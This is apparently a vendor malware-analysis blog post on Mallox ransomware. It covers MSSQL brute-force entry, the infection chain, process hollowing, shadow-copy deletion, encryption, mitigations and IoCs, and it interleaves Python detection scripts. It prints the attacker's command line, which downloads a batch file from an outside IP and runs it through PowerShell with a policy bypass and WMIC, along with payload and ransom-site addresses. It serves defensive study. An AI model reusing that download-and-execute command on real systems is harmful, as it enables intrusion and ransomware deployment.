Introduction:
First observed in the middle of 2021, Mallox Ransomware has emerged as a formidable threat in the cybercrime landscape. With its ability to encrypt all volumes, including local and network-shared drives, it gradually spreads control over the system, leaving victims in digital despair.
Mallox Ransomware appends the “.mallox” extension to encrypted files and drops a ransom note named “File Recovery.txt,” which contains a unique Tor link for further communication between the attacker and the unsuspecting users.
In this blog, we will take you deep into our research of the Mallox Ransomware, to help you understand how stealthily it works, as well as update you on how to stay protected.
Attack Vector:
Our investigation indicates that Mallox (aka TargetCompany) Ransomware is currently targeting unsecured Microsoft SQL Servers as an attack vector to infiltrate victims’ systems and distribute the ransomware.
Furthermore, we have noticed multiple failed and erroneous attempts on publicly exposed MSSQL servers to gain initial access to the victims’ network. This pattern indicates MSSQL brute force attacks and highlights these servers’ pivotal role as the primary point of entry into the victim’s system.
We observed that once it gains initial access to the unsecured MSSQL instance via brute force attacks, it uses the command line of the MSSQL service ‘sqlservr.exe’ to deliver the malicious files and payload onto the victim’s machine:
“C:\WINDOWS\\System32\\cmd.exe” /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(“http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat”, “%TEMP%\tzt.bat”) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create “%TEMP%\tzt.bat”
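A detection sketch for the command line above, added here as an example and not taken from the original research: it triages process-creation events in which sqlservr.exe is the parent and scores the traits visible in that command. The event field names, the shell list, the two-trait threshold and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Children that sqlservr.exe should rarely spawn (the list is an assumption).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wmic.exe"}
# Traits taken from the command line quoted above.
INDICATORS = {
    "ps_policy_bypass": re.compile(r"-(executionpolicy|ep)\s+bypass", re.I),
    "web_download": re.compile(r"net\.webclient|downloadfile|downloadstring", re.I),
    "wmic_process_create": re.compile(r"wmic(\.exe)?\s+process\s+call\s+create", re.I),
    "script_in_temp": re.compile(r'%temp%\\[^\s"&]+\.(ps1|bat|cmd)', re.I),
}

def triage(event):
    """Return None unless sqlservr.exe spawned a shell, else a finding dict."""
    if ntpath.basename(event["parent"]).lower() != "sqlservr.exe":
        return None
    if ntpath.basename(event["image"]).lower() not in SHELLS:
        return None
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(event["cmdline"]))
    # A bare shell child can be a legitimate xp_cmdshell job; two or more traits is the dropper pattern.
    return {"severity": "high" if len(hits) >= 2 else "review", "indicators": hits}

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
# Constructed events; 198.51.100.7 is a documentation address, not an IoC.
EVENTS = [
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 '
                r'& echo $cl.DownloadFile("http://198.51.100.7/a.bat", "%TEMP%\tzt.bat") >> %TEMP%\updt.ps1 '
                r'& powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create "%TEMP%\tzt.bat"'},
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir D:\Backups"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Tools\inventory.ps1"},
]

def run():
    return [triage(e) for e in EVENTS]

if __name__ == "__main__":
    for event, finding in zip(EVENTS, run()):
        print(finding, "<-", event["cmdline"][:60])
```

The third event returns no finding because this rule only covers children of the SQL Server service; a policy bypass launched elsewhere needs its own rule.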
Infection Chain:
During execution, tzt.bat injects the ransomware code into Aspnet_Compiler.exe, then drops and executes the killer.bat file, which deletes all the unwanted services and kills all the tasks so that the encryption process is successful.
Fig: Infection chain
Technical Analysis Of Payload:
The BAT file executes the .NET payload “Mfhigwwvise.exe,” which is responsible for the injection of ransomware code.
During analysis of the .NET payload, we found that it downloads another payload, a VDF file encrypted with the AES cipher, from “hxxps://files.catbox.moe/r6piiq.vdf”, as shown in the figure below.
This payload is then decrypted directly in memory.
Fig: Downloading VDF from C2
Fig: Decrypted VDF payload
The decrypted DLL file is further obfuscated with the IntelliLock obfuscator. The loader then loads the decrypted ransomware DLL into another process using the process hollowing technique.
After creating the thread pool, the loader uses the InvokeMember() function to inject the ransomware code into Aspnet_Compiler.exe and execute it.
Fig: Invokes the DLL function
Technical Analysis Of Injected Ransom Code:
The injected payload of the Mallox Ransomware is the main module. It contains the country check, deletion of the shadow copy, termination of running processes, and encryption.
First, it checks the default language ID for the current user to exclude some countries from the targeted attack.
Fig: Checks for Lang ID
It then creates threads. The first thread deletes registry keys and then the shadow copy, as shown below.
Fig: Deletion of Registry keys
Fig: Deletion of shadow copy
The second thread will modify the Boot Configuration and terminate some hardcoded processes.
Fig: Use of BCD cmd for boot configuration
Fig: Termination of process
After this, the third thread removes SQL-related services using the command line, as shown in the figure below:
Fig: Remove SQL-Related Services
Upon attempting to shut down or reboot the PC, it displays a warning message to the user stating: ‘Do NOT shut down OR reboot your PC: this might damage your files permanently!’
It modifies the Windows registry to prevent users from shutting down or restarting the system. Configuring specific registry values disables the Shutdown, Restart, and Sign-out options, effectively blocking users from performing these actions.
Fig: Disables the system options
Exfiltration Of System Information:
Mallox Ransomware can exfiltrate data from a targeted system prior to its encryption. Like the prevailing approach of numerous other contemporary ransomware groups, it operates a website to expose data owned by victims who refuse to meet ransom demands. It collects system information and transfers it to the C2 server.
Fig: Exfiltration of data targeted system
Fig: Connection to C2 server
Encryption:
Encryption threads are created based on the number of existing processors, with a maximum limit of 64 threads.
Fig: Encryption threads w.r.t No. Of processor
Folders And Files Exclusion:
It traverses all the directories using the FindFirstFileExW API, skipping safelisted files, folders, and extensions.
It also excludes the ransom note “File Recovery.txt” from the encryption process.
Fig: Comparing with safelisted folders
Fig: Comparing with safelisted ext.
Fig: Comparing with safelisted files
The Ransomware note, labelled “File Recovery.txt,” is created in all the folders. This note provides an Onion link for communication with the attackers for decryption, as shown below:
Run The TOR Browser And Open The Site:
Wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion[/]mallox[/]privateSignin
Fig: Creating ransom notes
It uses the Salsa20 encryption algorithm to encrypt the files.
After encryption, it appends “.Mallox” as a file extension.
Tips To Prevent Such Kinds Of Attacks:
Securing Microsoft SQL Server instances is crucial to prevent Mallox Ransomware attacks. Follow these recommended steps to enhance the security of your SQL Server environment:
- Firewall Protection/Limiting Access: Utilize a firewall to restrict access to SQL servers. Allow incoming traffic only from trusted networks and IPs. Specifically, block incoming traffic on port 1433 except for authorized users.
- Change Default Port: Avoid exposing SQL Servers on the default port (1433) over the Internet, as it’s a common target for hackers. Consider using a secure connection like a VPN for accessing SQL servers remotely.
- Secure Account Management: Disable the ‘sa’ (system administrator) account or set a strong, unique password to minimize unauthorized access risks. The sa account holds high privileges.
- Strong Passwords: Enforce strong, unique passwords for all SQL logins. Utilize a mix of upper- and lower-case letters, numbers, and special characters to enhance password security.
- Account Lockout Policies: Implement account lockout policies that temporarily lock out SQL Server logins after multiple failed attempts. This deters brute force attacks.
- Audit SQL CLR Assemblies: Review and deactivate SQL CLR assemblies that are not essential. Routinely assess and remove any redundant assemblies to mitigate potential vulnerabilities.
- Encrypt Data in Transit: Utilize SSL/TLS protocols to encrypt data during transmission between clients and SQL servers. This safeguards against potential eavesdropping and data interception.
- Keep an Eye on SQL Server Activity: Utilize SQL Server auditing to meticulously track and log every operation within your SQL Server instance. By actively monitoring these activities, you can swiftly detect and address any potential security risks.
- Stay Updated: Regularly apply the latest updates and patches to your SQL Server instance, Operating System and other installed applications. This helps mitigate known vulnerabilities and ensures ongoing security.
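The failed-login pattern described under Attack Vector, and the monitoring recommended in the "Account Lockout Policies" and "Keep an Eye on SQL Server Activity" items, can be checked with a script like the following. It is an added example, not SEQRITE's tooling: it parses SQL Server ERRORLOG logon lines, flags clients that exceed a failure threshold inside a sliding window, and records whether a success followed the burst. The threshold, the window, and the constructed sample log are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ERRORLOG "Logon" lines; the companion "Error: 18456" line carries no client and is skipped.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold failed logins inside the window (values are assumptions)."""
    recent = defaultdict(deque)  # client -> failure timestamps still inside the window
    users = defaultdict(set)     # client -> every login name it tried
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "failed":
            users[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                flagged.setdefault(ip, {"users": users[ip], "success_after_burst": None})
        elif ip in flagged and flagged[ip]["success_after_burst"] is None:
            flagged[ip]["success_after_burst"] = user
    return flagged

def sample_log():
    """Constructed excerpt: six failures in 10 s from one client, one stray failure, then a success."""
    fail = ("2023-08-14 03:12:{:02d}.45 Logon       Login failed for user '{}'. "
            "Reason: Password did not match that for the login provided. [CLIENT: {}]")
    lines = []
    for i, user in enumerate(["sa", "sa", "admin", "sa", "sa", "sa"]):
        lines.append("2023-08-14 03:12:{:02d}.45 Logon       Error: 18456, Severity: 14, State: 8.".format(2 * i))
        lines.append(fail.format(2 * i, user, "203.0.113.50"))
    lines.append(fail.format(30, "report_svc", "10.0.0.21"))
    lines.append("2023-08-14 03:12:40.10 Logon       Login succeeded for user 'sa'. "
                 "Connection made using SQL Server authentication. [CLIENT: 203.0.113.50]")
    return lines

if __name__ == "__main__":
    for ip, info in detect(sample_log()).items():
        print(ip, sorted(info["users"]), info["success_after_burst"])
```

A success from a client that has just been flagged is the event to escalate first. Successful logins only appear in the ERRORLOG when login auditing is set to record both failed and successful logins.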
Precautionary Measures For Minimizing Shared Data Damage Within The Network:
- Restricting Access to Shared Folders: Use network separation to limit access to shared folders only to those who need it. Apply strong access controls to ensure that only authorized individuals can change shared data on the network.
- Regular Data Backups: Consistently back up shared data to a secure and isolated location. Periodically test backups to verify data integrity and to ensure a swift data restoration process in the event of an attack.
- Scheduled Offline Backups: Maintain offline backups of critical shared data to protect against ransomware attacks that may attempt to encrypt live/online backups.
By adhering to these precautions, we can significantly reduce the risk of Mallox Ransomware attacks targeting Microsoft SQL Server instances and bolster the overall security posture of our environment.
How Does SEQRITE Protect Its Customers From Mallox Ransomware?
SEQRITE’s AntiVirus has signatures for various script files utilized in the attack, as well as for the Ransom payload. The signatures against this Ransomware are as indicated below:
- Ransom.Mallox.S28994722
- PS.Downloader.Boxter.47436
- BAT.Agent.CQ
- Script.Trojan-Downloader.A8341828
- Script.Trojan.A8269601
Conclusion:
As cyber threats grow in sophistication, the Mallox Ransomware emerges as a stealthy and ever-evolving adversary.
Its strategy is clear: to target unguarded MSSQL Servers as its starting point. Once inside, it unleashes a complex infection chain using a combination of malicious files to inject chaos into the system’s processes under the shroud of encryption.
The Mallox Ransomware, with its intricate threads of malevolence, preys on vulnerability, turning your digital world into a high-stakes battleground. A typical digital hostage situation, where the demand is clear – your precious data or payment for freedom!
SEQRITE’s signature-based protection offers defense against this ransomware variant.
MITRE ATT&CK TTPs:
| Technique | ID |
| --- | --- |
| Command and Scripting Interpreter | T1059 |
| Inhibit System Recovery | T1490 |
| File and Directory Discovery | T1083 |
| System Information Discovery | T1082 |
| Data Encrypted for Impact | T1486 |
| Service Stop | T1489 |
IOCs:
Bat loader:
77BFCEE98F086C8E25A69D252A6609E1
08D4D184E6E3484E8B676FA0E0A24AFA
Payload:
1B7578D04324CD6C8BF11985B79A814A
Authors:
Soumen Burma
Vaibhav Billade
Umar Khan